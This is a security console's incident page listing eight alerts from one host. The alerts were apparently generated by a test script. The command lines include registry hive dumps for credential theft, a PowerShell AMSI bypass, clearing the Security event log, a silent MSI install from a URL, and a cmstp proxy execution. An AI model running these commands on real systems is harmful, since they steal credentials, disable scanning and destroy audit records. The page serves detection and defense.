Back to list
Critical CINC-20251220-78AD36BD new
Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:8679516932
Incident Overview
Incident ID
CINC-20251220-78AD36BD
Severity
Critical (90)
Status
new
Alert Count
8
Host Count
1
Timeline
First Seen
2025-12-18 11:23:41
Last Seen
2025-12-18 11:24:56
Duration
0d 0h 1m
Created
2025-12-20 13:23
Updated
2026-01-13 15:14
Kill Chain Analysis
Rec...
Ini...
Exe...
Per...
Pri...
Def...
Cre...
Dis...
Lat...
Col...
Com...
Exf...
Imp...
Observed Tactics:
Techniques:
Affected Hosts (1)
Related Alerts (8)
| Severity | Status | Hostname | Description | Tactic | Command Line | Time |
|---|---|---|---|---|---|---|
| Critical | new | TEAHEE | Credential Access | reg save HKLM\SYSTEM C:\Users\dokji\AppData\Local\Temp\system.hiv | 12-18 11:24 | |
| High | new | TEAHEE | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-18 11:24 | |
| Critical | new | TEAHEE | Credential Access | reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv | 12-18 11:24 | |
| High | new | TEAHEE | Execution | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-18 11:24 | |
| High | new | TEAHEE | Defense Evasion | wevtutil cl Security | 12-18 11:24 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-18 11:24 | |
| High | new | TEAHEE | Defense Evasion | cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf | 12-18 11:24 | |
| Informational | new | TEAHEE | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-18 11:23 |